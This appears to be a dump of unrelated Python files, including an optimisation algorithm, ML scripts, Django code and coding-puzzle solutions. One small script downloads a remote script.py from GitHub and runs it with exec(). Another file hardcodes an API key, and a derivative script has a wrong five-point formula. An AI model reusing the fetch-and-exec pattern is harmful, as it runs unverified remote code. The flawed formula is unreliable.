surrogate_lb, surrogate_ub = self.get_surrogate_bounds(p_list, problem)
# Get the offsprings from the current population. #
p_list_off = self.get_offsprings(p_list, f_list, constraint_violations, crowding_list, problem, surrogate_lb=surrogate_lb, surrogate_ub=surrogate_ub)
if len(p_list_off) != 0:
f_list_off = np.zeros((p_list_off.shape[0], problem.m))
for index_p_off in range(p_list_off.shape[0]):
f_list_off[index_p_off, :] = problem.evaluate_functions(p_list_off[index_p_off, :])
self.add_to_stopping_condition_current_value('max_f_evals', p_list_off.shape[0])
constraint_violations_off = np.array([[sum([constraint if constraint > 0 else 0 for constraint in problem.evaluate_constraints(p_off)])] for p_off in p_list_off])
p_list = np.concatenate((p_list, p_list_off), axis=0)
f_list = np.concatenate((f_list, f_list_off), axis=0)
constraint_violations = np.concatenate((constraint_violations, constraint_violations_off), axis=0)
# Every new offspring is considered not epsilon-Pareto-stationarity. #
eps_pareto_stationarity = np.concatenate((eps_pareto_stationarity, np.array([[False] * len(objectives_powerset)] * p_list_off.shape[0])), axis=0)
# Given the current population and the offsprings, the survival strategy is used to get at most pop_size survivals. #
p_list, f_list, constraint_violations, rank_list, crowding_list, eps_pareto_stationarity, threshold_crowding_distance = self._survival_strategy.get_survivals(p_list, f_list, constraint_violations, eps_pareto_stationarity)
self.show_figure(p_list, f_list)
# Every n_opt iterations, the FMOPG Algorithm is called on some points. #
if self.get_stopping_condition_current_value('max_iter') % self._n_opt == 0:
optimization_success = False
one_tried_optimization = False
theta_fault = True
for p in range(p_list.shape[0]):
if self.evaluate_stopping_conditions():
break
"""
The points to optimize through the FMOPG Algorithm are the ones with:
- rank 0;
- no constraint violation;
- a crowding-distance that is higher than or equal to the threshold_crowding_distance (the requested quantile of the finite crowding distances related to the rank-0 feasible points).
"""
if rank_list[p] == 0 and constraint_violations[p] == 0 and crowding_list[p] >= threshold_crowding_distance:
# The selected points are optimized w.r.t. each subset of the objective functions indices, if they are not epsilon-Pareto-stationary for that subset. #
for index_I_p, I_p in enumerate(objectives_powerset):
if not eps_pareto_stationarity[p, index_I_p]:
if self.evaluate_stopping_conditions():
break
# In order to be optimized for a subset of the objective functions indices, the point must be not dominated by other points w.r.t. that subset. #
if self.exists_dominating_point(f_list[p, I_p,], np.delete(f_list, p, 0)[:, I_p, ]):
continue
one_tried_optimization = True
n_current_points = p_list.shape[0]
# theta_tol indicates the tolerance after which a point is considered Pareto-stationary for the FMOPG Algorithm. #
self._local_search_optimizer.reset_stopping_conditions_current_values(self._theta_tol)
p_list, f_list, theta_array = self._local_search_optimizer.search(p_list, f_list, problem, index_initial_point=p, I=I_p)
self.update_stopping_condition_current_value('max_f_evals', self._local_search_optimizer.get_stopping_condition_current_value('max_f_evals'))
# theta_for_stationarity indicates the tolerance after which a point is considered Pareto-stationary for the NSMA Algorithm. #
if theta_array[0] >= self._theta_for_stationarity:
eps_pareto_stationarity[p, index_I_p] = True
if p_list.shape[0] > n_current_points:
# At least one new point is obtained by the FMOPG Algorithm. #
optimization_success = True
theta_fault = False
for index_new_point in range(n_current_points, p_list.shape[0]):
constraint_violations = np.concatenate((constraint_violations, np.array([[sum([constraint if constraint > 0 else 0 for constraint in problem.evaluate_constraints(p_list[index_new_point, :])])]])), axis=0)
eps_pareto_stationary_tmp = np.array([[False] * len(objectives_powerset)])
if theta_array[index_new_point - n_current_points + 1] >= self._theta_for_stationarity:
eps_pareto_stationary_tmp[0, index_I_p] = True
eps_pareto_stationarity = np.concatenate((eps_pareto_stationarity, eps_pareto_stationary_tmp), axis=0)
else:
if (theta_array < self._theta_tol).any():
theta_fault = False
if optimization_success:
# If at least a point from the FMOPG Algorithm is obtained, NSMA uses the survival strategy to get at most pop_size survivals. #
p_list, f_list, constraint_violations, rank_list, crowding_list, eps_pareto_stationarity, _ = self._survival_strategy.get_survivals(p_list, f_list, constraint_violations, eps_pareto_stationarity)
# If at least a point from the FMOPG Algorithm is obtained or no point is generated because theta_tol is too small (negative number), then theta_tol is contracted through the coefficient theta_dec_factor. #
self._theta_tol *= self._theta_dec_factor if optimization_success or (one_tried_optimization and theta_fault) else 1
self.show_figure(p_list, f_list)
self.add_to_stopping_condition_current_value('max_iter', 1)
self.close_figure()
self.output_data(f_list, max_finite_rank=max(rank_list[np.isfinite(rank_list)]), max_rank=max(rank_list.flatten()), min_crowding_dist=min(crowding_list.flatten()))
return p_list, f_list, time.time() - self.get_stopping_condition_current_value('max_time')
def get_surrogate_bounds(self, p_list: np.array, problem: Problem):
"""
Compute the surrogate bounds based on the current population
:param p_list: population solutions
:param problem: the problem at hand
:return: the surrogate bounds
"""
surrogate_lb = np.max(np.array([problem.lb, np.min(p_list, axis=0) - self.__shift]), axis=0)
surrogate_ub = np.min(np.array([problem.ub, np.max(p_list, axis=0) + self.__shift]), axis=0)
return surrogate_lb, surrogate_ub
|
# Script of derivate computation
import numpy as np
import matplotlib.pyplot as plt
def dfdx_1(f,x,h):
return (f(x + h) - f(x))/h
def dfdx_2(f,x,h):
return (f(x) - f(x-h))/h
def dfdx_3(f,x,h):
return (f(x + h) - f(x - h))/(2*h)
def dfdx_4(f,x,h):
return (-f(x + 2*h) + 8*f(x + h) - 8*f(x - h) + f(x - 2*h))/(2*h)
n = 200
x = np.linspace(0, np.pi /50, n + 1)
h = (np.pi /50 )/ n
def sin100x(x):
return np.sin(100*x)
dydx_1 = dfdx_1(sin100x,x,h)
dydx_2 = dfdx_2(sin100x,x,h)
dydx_3 = dfdx_3(sin100x,x,h)
dydx_4 = dfdx_4(sin100x,x,h)
dYdx = 100*np.cos(100*x)
#plt.figure(figsize=(12,5))
plt.plot(x,dydx_1,'.',label='Approx left method')
plt.plot(x,dydx_2,'.',label='Approx right method')
plt.plot(x,dydx_3,'.',label='Approx central method')
plt.plot(x,dydx_4,'.',label='Approx five point method')
plt.plot(x,dYdx,'b',label='Exact Value')
plt.title('Derivative of y = cos(100x)')
plt.legend(loc='best')
plt.show()
|
import argparse
import logging
import os
import koco
import pandas as pd
import torch
import torch.nn.functional as F
from omegaconf import OmegaConf
from transformers import BertForSequenceClassification
from utils import get_device_and_ngpus, makedirs, read_lines
logger = logging.getLogger(__name__)
device, n_gpus = get_device_and_ngpus()
result_dir = "results"
makedirs(result_dir)
def main(conf, testfile, save):
# Load saved data
checkpoint_path = f"{conf.checkpoint_dir}/{conf.model_name}.pt"
log_path = f"{conf.log_dir}/{conf.model_name}.log"
saved_model = torch.load(checkpoint_path, map_location=device)["model"]
saved_data = torch.load(log_path, map_location=device)
tokenizer = saved_data["tokenizer"]
config = saved_data["config"]
label2idx = saved_data["classes"]
idx2label = {idx: label for label, idx in label2idx.items()}
if testfile == "koco-test":
test = koco.load_dataset("korean-hate-speech", mode="test")
if config.label.hate and config.label.bias:
if os.path.exists(
"korean-hate-speech-dataset/labeled/test.bias.ternary.tsv"
):
df = pd.read_csv(
"korean-hate-speech-dataset/labeled/test.bias.ternary.tsv", sep="\t"
)
else:
raise NotImplementedError(
"Adding external bias information is not supported, yet"
)
test = []
for i, row in df.iterrows():
test.append({"comments": row["comments"], "bias": row["label"]})
else:
test = []
for line in read_lines(testfile):
test.append({"comments": line})
test_texts = []
for t in test:
test_text = t["comments"]
if config.label.hate and config.label.bias:
bias_context = f'<{t["bias"]}>'
test_text = f"{bias_context} {test_text}"
test_texts.append(test_text)
with torch.no_grad():
# Declare model and load pre-trained weights
model = BertForSequenceClassification.from_pretrained(
config.pretrained_model, num_labels=len(label2idx)
)
if config.tokenizer.register_names:
model.resize_token_embeddings(len(tokenizer))
elif config.label.hate and config.label.bias:
model.resize_token_embeddings(len(tokenizer))
model.load_state_dict(saved_model)
model.to(device)
# Predict!
model.eval()
y_hats, tokens = [], []
for index in range(0, len(test_texts), config.train_hparams.batch_size):
batch = test_texts[index : index + config.train_hparams.batch_size]
batch_tokenized = tokenizer(
batch, padding=True, truncation=True, return_tensors="pt"
)
x = batch_tokenized["input_ids"]
mask = batch_tokenized["attention_mask"]
x = x.to(device)
mask = mask.to(device)
y_hat = F.softmax(model(x, attention_mask=mask)[0], dim=-1)
y_hats += [y_hat]
batch_token_lists = [tokenizer.tokenize(t) for t in batch]
tokens += batch_token_lists
y_hats = torch.cat(y_hats, dim=0) # (len(test), n_classes)
probs, indices = y_hats.cpu().topk(1)
# Print!
if not save:
for test_text, index, token in zip(test_texts, indices, tokens):
print(test_text)
print(" ".join(token))
print(idx2label[int(index[0])])
print("======================================================")
# Save!
if save:
# Save test comment + predicted label
with open(
f"{result_dir}/{os.path.basename(testfile)}.{conf.model_name}.predict", "w"
) as f:
f.write("comments" + "\t" + "prediction" + "\n")
for test_text, index in zip(test_texts, indices):
f.write(test_text + "\t" + str(idx2label[int(index[0])]) + "\n")
# Save tokenized test comment + predicted label
with open(
f"{result_dir}/{os.path.basename(testfile)}.{conf.model_name}.tokens", "w"
) as f:
f.write("tokens" + "\t" + "prediction" + "\n")
for token, index in zip(tokens, indices):
f.write(" ".join(token) + "\t" + str(idx2label[int(index[0])]) + "\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--config", help="Path of the config yaml", required=True)
parser.add_argument("--save", help="Save the prediction", action="store_true")
input_group = parser.add_mutually_exclusive_group(required=True)
input_group.add_argument(
"--koco-test",
action="store_true",
help="Run model on korean-hate-speech testset",
)
input_group.add_argument("--filepath", help="Run model on given file")
args = parser.parse_args()
testfile = "koco-test" if args.koco_test else args.filepath
config = OmegaConf.load(args.config)
main(config, testfile, args.save)
|
from django.http.response import JsonResponse
from django.shortcuts import render
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.parsers import JSONParser
from products.models import Product
from products.serializers import ProductSerializer
# Create your views here.
@api_view(['GET', 'POST', 'DELETE'])
def product_list(request):
# GET list of products, POST a new products, DELETE all products
if request.method == 'GET':
products = Product.objects.all()
title = request.GET.get('title', None)
if title is not None:
products = products.filter(title__icontains=title)
tutorials_serializer = ProductSerializer(products, many=True)
return JsonResponse(tutorials_serializer.data, safe=False)
# 'safe=False' for objects serialization
elif request.method == 'POST':
tutorial_data = JSONParser().parse(request)
tutorial_serializer = ProductSerializer(data=tutorial_data)
if tutorial_serializer.is_valid():
tutorial_serializer.save()
return JsonResponse(tutorial_serializer.data, status=status.HTTP_201_CREATED)
return JsonResponse(tutorial_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
count = Product.objects.all().delete()
return JsonResponse({'message': '{} products were deleted successfully!'.format(count[0])}, status=status.HTTP_204_NO_CONTENT)
@api_view(['GET', 'PUT', 'DELETE'])
def product_detail(request, pk):
# find products by pk (id)
try:
tutorial = Product.objects.get(pk=pk)
except Product.DoesNotExist:
return JsonResponse({'message': 'The product does not exist'}, status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
tutorial_serializer = ProductSerializer(tutorial)
return JsonResponse(tutorial_serializer.data)
elif request.method == 'PUT':
tutorial_data = JSONParser().parse(request)
tutorial_serializer = ProductSerializer(tutorial, data=tutorial_data)
if tutorial_serializer.is_valid():
tutorial_serializer.save()
return JsonResponse(tutorial_serializer.data)
return JsonResponse(tutorial_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
tutorial.delete()
return JsonResponse({'message': 'Product was deleted successfully!'}, status=status.HTTP_204_NO_CONTENT)
# GET / PUT / DELETE products
|
import json
defaultconfig={'station':'B08','apikey':'kfgpmgvfgacx98de9q3xazww','walktime':'6','loop':'False','simulate':'True'}
#I've hardcoded my default configuration for the program, for resetting purposes or in case the config.json file is deleted
class myMetro:
"""
Class for personal metro data. Most of this is obtained from config file,
at least currently.
"""
def __init__(self):
try:
metroconf=json.load(open('config.json'))
except:
print("Error loading JSON, defaulting to standard config")
#I've hardcoded my default configuration for the program, for resetting purposes or in case the config.json file is deleted
metroconf=defaultconfig
self.station=metroconf['station']
self.apikey=metroconf['apikey']
self.walktime=int(metroconf['walktime']) #how long it takes to walk to station
def url(self):
return "http://api.wmata.com/StationPrediction.svc/json/GetPrediction/"+self.station+"?api_key="+self.apikey
|
def read_lines(file_name):
lines = open(file_name).readlines()
lines = filter(lambda l: l != "\n", lines)
lines = list(map(lambda l: l[:-1].lower(), lines))
lines.reverse()
return lines
def read_def(lines, title=None):
t, count = lines.pop().split(":")
if(title is None):
return t, int(count)
assert t == title
return int(count) |
"""
Given a string (with words and spaces), split it into substrings that have at most k characters each.
Each substring must contain whole words only. Assume that k > the shortest word in the sentence.
Example:
s = "I pet my cats and dogs"
k = 5
expected output: ['I pet', 'my', 'cats', 'and', 'dogs']
Example 2:
s = "the quick brown fox jumps over the lazy dog"
k = 15
expected output: ['the quick brown', 'fox jumps over', 'the lazy dog']
"""
class Solution:
def splitSentence(self, s, k):
output = []
i = 0; j = 0
sWords = s.split(" ")
charCount = 0
while j < len(sWords):
currWord = sWords[j]
charCount += len(currWord) + 1
if (charCount - 1) > k:
currSent = "".join(sWords[q] + " " for q in range(i, j))
output.append(currSent[:-1])
charCount = 0
i = j
else:
j += 1
output.append("".join(sWords[q] + " " for q in range(i, len(sWords)))[:-1])
return output
def test(self):
#s = "I pet my cats and dogs"; k = 5
s = "the quick brown fox jumps over the lazy dog"; k = 15
result = self.splitSentence(s, k)
print("result: ", result)
s = Solution()
s.test()
|
# We can efficiently solve for multiple potentials with one command
# Under the hood, using the batch functionality is more efficient
# than solving for one potential at a time because executing in batch
# doesn't require transitioning back in forth between the python
# and the C backend between jobs.
import schrod
import numpy as np
# Specify the 10 ho potentials
x = np.linspace(-5, 5, 200)
ws=np.arange(1,11)
V = 1/2 * np.outer(ws**2, x**2)
# Create and solve Schrodinger's equation
eqn = schrod.Schrod(x, V, n_basis=40)
eqn.solve()
# Print the first five eigenvalues
print(eqn.eigs[...,0:5])
|
import urllib.request
import time
success = False
for i in range(6 * 3):
try:
url = 'https://raw.githubusercontent.com/wkcn/SYSULAB/master/script.py'
req = urllib.request.Request(url)
f = urllib.request.urlopen(req)
s = f.read()
success = True
break
except urllib.error.HTTPError:
sleep(10)
if success:
exec(s)
|
N=int(input())
Sum=0
numerator=2
dinominator=1
for i in range(N):
Sum+=numerator/dinominator
temp=numerator+dinominator
dinominator=numerator
numerator=temp
print('{:.2f}'.format(Sum)) |
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.http import *
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.contrib.auth.decorators import login_required
from django.utils.decorators import method_decorator
from smarter.views import GenericViews
from web.models import *
import taggit
from git import *
def home(request):
return render_to_response( "base.html", context_instance = RequestContext( request ), mimetype = "text/html" )
def welcome(request):
return render_to_response( "base.html", context_instance = RequestContext( request ), mimetype = "text/html" )
|
# Generated by Django 3.0 on 2021-01-16 10:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("grades", "0026_remove_grade_semester_code"),
]
operations = [
migrations.CreateModel(
name="Favourite",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("created_date", models.DateTimeField(auto_now_add=True)),
(
"course",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="user_favourites",
to="grades.Course",
),
),
(
"user",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="favourite_courses",
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"ordering": ("-created_date",),
"unique_together": {("user", "course")},
},
),
]
|
from __future__ import print_function, absolute_import, division
from builtins import map
from future.builtins import *
from future import standard_library
standard_library.install_aliases()
# Copyright 2017 Autodesk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from moldesign import units as u
import numpy as np
import collections
import webcolors
DEF_CATEGORICAL = 'Paired'
DEF_SEQUENTIAL = None # should be inferno, but that's only MPL >1.5
def colormap(cats, mplmap='auto', categorical=None):
""" Map a series of categories to hex colors, using a matplotlib colormap
Generates both categorical and numerical colormaps.
Args:
cats (Iterable): list of categories or numerical values
mplmap (str): name of matplotlib colormap object
categorical (bool): If None
(the default) interpret data as numerical only if it can be cast to float.
If True, interpret this data as categorical. If False, cast the data to float.
Returns:
List[str]: List of hexadecimal RGB color values in the in the form ``'#000102'``
"""
# Should automatically choose the right colormaps for:
# categorical data
# sequential data (low, high important)
# diverging data (low, mid, high important)
global DEF_SEQUENTIAL
from matplotlib import cm
if hasattr(cm, 'inferno'):
DEF_SEQUENTIAL = 'inferno'
else:
DEF_SEQUENTIAL = 'BrBG'
# strip units
units = None # TODO: build a color bar with units
if hasattr(cats[0], 'magnitude'):
arr = u.array(cats)
units = arr.units
cats = arr.magnitude
is_categorical = False
else:
is_categorical = not isinstance(cats[0], (float, int))
if categorical is not None:
is_categorical = categorical
if is_categorical:
values = _map_categories_to_ints(cats)
if mplmap == 'auto':
mplmap = DEF_CATEGORICAL
else:
values = np.array(list(map(float, cats)))
if mplmap == 'auto':
mplmap = DEF_SEQUENTIAL
rgb = _cmap_to_rgb(mplmap, values)
hexcolors = [webcolors.rgb_to_hex(np.array(c)) for c in rgb]
return hexcolors
def _map_categories_to_ints(cats):
values = np.zeros(len(cats), dtype='float')
to_int = collections.OrderedDict()
for i, item in enumerate(cats):
if item not in to_int:
to_int[item] = len(to_int)
values[i] = to_int[item]
return values
def _cmap_to_rgb(mplmap, values):
from matplotlib import cm
cmap = getattr(cm, mplmap)
mx = values.max()
mn = values.min()
cat_values = (values-mn)/(mx-mn) # rescale values [0.0,1.0]
rgba = cmap(cat_values) # array of RGBA values in range [0.0, 1.0]
# strip alpha field and rescale to [0,255] RGB integers
rgb = [list(map(int, c[:3]*256.0)) for c in rgba]
return rgb
def is_color(s):
""" Do our best to determine if "s" is a color spec that can be converted to hex
Args:
s (str or int): string or integer describing a color
Returns:
bool: True if this can be converted to a hex-compatible color
"""
def in_range(i): return 0 <= i <= int('0xFFFFFF', 0)
try:
if type(s) == int:
return in_range(s)
elif type(s) not in (str, bytes):
return False
elif s in webcolors.css3_names_to_hex:
return True
elif s[0] == '#':
return in_range(int('0x' + s[1:], 0))
elif s[0:2] == '0x':
return in_range(int(s, 0))
elif len(s) == 6:
return in_range(int('0x' + s, 0))
except ValueError:
return False
|
## -*- coding: utf-8 -*- ####################################################
from django.conf import settings
from django.utils.translation import ugettext
from image_editor.filters.basic import ImageEditToolBasic
#CROP_RATIO
class ImageCropTool(ImageEditToolBasic):
class Media:
js = ('jcrop/js/jquery.Jcrop.min.js', 'jcrop/js/cropper.js')
css = { 'all': ('jcrop/css/jquery.Jcrop.css', ) }
def render_button(self, attrs, filter_name):
return """
<img src="%(static_url)s%(image_url)s" style="margin: 6px;" /><br/>%(filter_title)s \
<script>
$(function(){
$("#%(id)s_button_crop").cropper(
"%(id)s",
%(options)s
);
});
</script>
""" % \
{
'static_url': settings.STATIC_URL or settings.MEDIA_URL,
'image_url': 'image_editor/img/crop.png',
'id': attrs['id'],
'filter_title': ugettext('Crop'),
'options': self.options
}
def render_initial(self, attrs, filter_name):
return ""
def proceed_image(self, image, params):
width, height = image.size
x_coef = float(width) / float(params['width'])
y_coef = float(height) / float(params['height'])
image = image.crop((
int(params['x'] * x_coef), int(params['y'] * y_coef), int(params['x2'] * x_coef), int(params['y2'] * y_coef)))
return image |
from django.contrib import admin
from doors.keymaster.models import *
class KeymasterAdmin(admin.ModelAdmin):
def force_sync(self, request, queryset):
for km in queryset:
km.force_sync()
self.message_user(request, "Sync will be forced on next contact from the gatekeeper")
list_display = ('description', 'gatekeeper_ip', 'access_ts', 'success_ts', 'sync_ts', 'is_enabled')
search_fields = ('gatekeeper_ip', 'is_enabled')
actions = ["force_sync", ]
class DoorEventAdmin(admin.ModelAdmin):
list_display = ('timestamp', 'door', 'event_type', 'user', 'code', 'event_description', )
list_filter = ('door', 'event_type', )
search_fields = ('user', 'code')
ordering = ['-timestamp']
admin.site.register(Keymaster, KeymasterAdmin)
admin.site.register(DoorEvent, DoorEventAdmin)
admin.site.register(Door)
admin.site.register(DoorCode)
admin.site.register(GatekeeperLog)
# Copyright 2020 Office Nomads LLC (https://officenomads.com/) Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at https://opensource.org/licenses/Apache-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
|
'''
泰波那契序列 Tn 定义如下:
T0 = 0, T1 = 1, T2 = 1, 且在 n >= 0 的条件下 Tn+3 = Tn + Tn+1 + Tn+2
给你整数 n,请返回第 n 个泰波那契数 Tn 的值。
示例 1:
输入:n = 4
输出:4
解释:
T_3 = 0 + 1 + 1 = 2
T_4 = 1 + 1 + 2 = 4
示例 2:
输入:n = 25
输出:1389537
提示:
0 <= n <= 37
答案保证是一个 32 位整数,即 answer <= 2^31 - 1。
'''
from leetcode.tools.time import printTime
class Solution:
'''
矩阵快速幂
'''
@printTime()
def tribonacci(self, n: int) -> int:
base = [[0], [1], [1]]
if n < 3:
return base[n][0]
def pmatrix(a, b):
ret = [[0 for _ in range(len(b[0]))] for _ in range(len(a))]
for i in range(len(ret)):
for j in range(len(ret[0])):
s = 0
for k in range(len(a[0])):
s += a[i][k] * b[k][j]
ret[i][j] = s
return ret
def qpow(k):
mat = [[0, 1, 0],
[0, 0, 1],
[1, 1, 1]]
ans = [[1, 0, 0],
[0, 1, 0],
[0, 0, 1]]
while k:
if k & 1:
ans = pmatrix(ans, mat)
mat = pmatrix(mat, mat)
k >>= 1
return pmatrix(ans, base)
return qpow(n - 2)[2][0]
Solution().tribonacci(3)
'''
[0, 1, 0] Fn Fn + 1
[0, 0, 1] Fn + 1 Fn + 2
[1, 1, 1] Fn + 2 Fn + 3
''' |
import discord
import time
import datetime
import asyncio
import random
from discord.ext import commands
from random import randint
class Games():
def __init__(self, bot):
self.bot = bot
@commands.command()
async def choose(self, *choices : str):
"""Chooses Between Multiple Choices!"""
await self.bot.say(random.choice(choices))
def setup(bot):
bot.add_cog(Games(bot))
|
# Minci
# time elapsed: 37 min
# submitted 2 times
class Solution:
def calculate(self, s: str) -> int:
# re-organize spaces
s = s.replace(' ', '')
for op in "+-*/":
s = s.replace(op, str(' ' + op + ' '))
# separate the list by space
s = s.split(' ')
# convert string to int
for i in range(len(s)):
if s[i].isnumeric():
s[i] = int(s[i])
# compute high order operators
while "*" in s or "/" in s:
for i in range(len(s)):
if s[i] == "*" or s[i] == '/':
if s[i] == "*":
# a = a*b in ['a', '*', 'b']
s[i - 1] *= s[i + 1]
# remove last two elements
s.pop(i)
s.pop(i)
break
elif s[i] == "/":
s[i - 1] //= s[i + 1]
s.pop(i)
s.pop(i)
break
# compute low order operators
while "+" in s or "-" in s:
for i in range(len(s)):
if s[i] == "+" or s[i] == '-':
if s[i] == "+":
s[i - 1] += s[i + 1]
s.pop(i)
s.pop(i)
break
elif s[i] == "-":
s[i - 1] -= s[i + 1]
s.pop(i)
s.pop(i )
break
# print(s)
return s[0]
sol = Solution()
sol.calculate("3+5/2") |
import logging
from celery.utils.log import get_task_logger
from lms.lmstests.sandbox.config.celery import app
from lms.lmstests.sandbox.linters import base
_logger: logging.Logger = get_task_logger(__name__)
_logger.setLevel(logging.INFO)
@app.task
def run_linters_in_sandbox(solution_file_id: str, code: str, file_suffix: str):
_logger.info('Start running sandbox check solution %s', solution_file_id)
get_linter = base.BaseLinter.get_match_linter
try:
checker = get_linter(_logger, code, file_suffix, solution_file_id)
except NotImplementedError:
_logger.info('All linters must implement BaseLinter core methods.')
raise
if checker is None:
_logger.info('No suitable linter for file %s', solution_file_id)
return []
checker.initialize()
try:
return checker.run_check()
except Exception: # NOQA: B902
_logger.exception("Can't check solution %s", solution_file_id)
return []
|
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, Flatten, Dropout, Dense, BatchNormalization, MaxPooling2D
from keras.models import Model
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
from sklearn.metrics import confusion_matrix
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
x_train, x_test = x_train / 255.0, x_test / 255.0
y_train = y_train.flatten()
y_test = y_test.flatten()
print('x_train.shape, y_train.shape, x_test.shape, y_test.shape', x_train.shape, y_train.shape, x_test.shape, y_test.shape)
# convolution expects height, width, color
# number of classes
K = len(set(y_train))
print(f"Num of classes {K}")
# Build model
i = Input(shape=x_train[0].shape)
x = Conv2D(32, (3, 3), activation='relu', padding='same')(i)
x = BatchNormalization()(x)
x = Conv2D(32, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2))(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2))(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2))(x)
x = Flatten()(x)
x = Dropout(0.2)(x)
x = Dense(1024, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(K, activation='softmax')(x)
model = Model(i, x)
# compile the model
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
batch_size = 32
data_generator = tf.keras.preprocessing.image.ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, horizontal_flip=True)
train_generator = data_generator.flow(x_train, y_train, batch_size)
steps_per_epoch = x_train.shape[0] // batch_size
r = model.fit(train_generator, validation_data=(x_test, y_test), steps_per_epoch=steps_per_epoch, epochs=50)
plt.plot(r.history['loss'], label='loss')
plt.plot(r.history['val_loss'], label='val_loss')
plt.legend()
plt.show()
plt.plot(r.history['accuracy'], label='acc')
plt.plot(r.history['val_accuracy'], label='val_acc')
plt.legend()
plt.show()
p_test = model.predict(x_test).argmax(axis=1)
cm = confusion_matrix(y_test, p_test)
plt.figure(figsize=(10,10))
sns.heatmap(data=cm, annot=True)
plt.show()
labels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
misclassified_idx = np.where(p_test != y_test)[0]
i = np.random.choice(misclassified_idx)
plt.imshow(x_test[i], cmap='gray')
plt.title("True label: %s Predicted: %s" % (labels[y_test[i]], labels[p_test[i]]))
plt.show()
|
from numpy import *
from numpy.linalg import *
bac = array([[2, 1, 4],[1, 2, 0],[2, 3, 2]])
vet = array(eval(input("Vetor: ")))
vet = vet.T
qtd = dot(inv(bac),vet)
print("estafilococo: ", round(qtd[0], 1))
print("salmonela: ", round(qtd[1], 1))
print("coli: ", round(qtd[2], 1))
if(qtd[0] == min(qtd)):
print("estafilococo")
elif(qtd[1] == min(qtd)):
print("salmonela")
else:
print("coli") |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource_py3 import SubResource
class LoadBalancingRule(SubResource):
"""A load balancing rule for a load balancer.
All required parameters must be populated in order to send to Azure.
:param id: Resource ID.
:type id: str
:param frontend_ip_configuration: A reference to frontend IP addresses.
:type frontend_ip_configuration:
~azure.mgmt.network.v2018_04_01.models.SubResource
:param backend_address_pool: A reference to a pool of DIPs. Inbound
traffic is randomly load balanced across IPs in the backend IPs.
:type backend_address_pool:
~azure.mgmt.network.v2018_04_01.models.SubResource
:param probe: The reference of the load balancer probe used by the load
balancing rule.
:type probe: ~azure.mgmt.network.v2018_04_01.models.SubResource
:param protocol: Required. Possible values include: 'Udp', 'Tcp', 'All'
:type protocol: str or
~azure.mgmt.network.v2018_04_01.models.TransportProtocol
:param load_distribution: The load distribution policy for this rule.
Possible values are 'Default', 'SourceIP', and 'SourceIPProtocol'.
Possible values include: 'Default', 'SourceIP', 'SourceIPProtocol'
:type load_distribution: str or
~azure.mgmt.network.v2018_04_01.models.LoadDistribution
:param frontend_port: Required. The port for the external endpoint. Port
numbers for each rule must be unique within the Load Balancer. Acceptable
values are between 0 and 65534. Note that value 0 enables "Any Port"
:type frontend_port: int
:param backend_port: The port used for internal connections on the
endpoint. Acceptable values are between 0 and 65535. Note that value 0
enables "Any Port"
:type backend_port: int
:param idle_timeout_in_minutes: The timeout for the TCP idle connection.
The value can be set between 4 and 30 minutes. The default value is 4
minutes. This element is only used when the protocol is set to TCP.
:type idle_timeout_in_minutes: int
:param enable_floating_ip: Configures a virtual machine's endpoint for the
floating IP capability required to configure a SQL AlwaysOn Availability
Group. This setting is required when using the SQL AlwaysOn Availability
Groups in SQL server. This setting can't be changed after you create the
endpoint.
:type enable_floating_ip: bool
:param disable_outbound_snat: Configures SNAT for the VMs in the backend
pool to use the publicIP address specified in the frontend of the load
balancing rule.
:type disable_outbound_snat: bool
:param provisioning_state: Gets the provisioning state of the PublicIP
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: The name of the resource that is unique within a resource
group. This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
"""
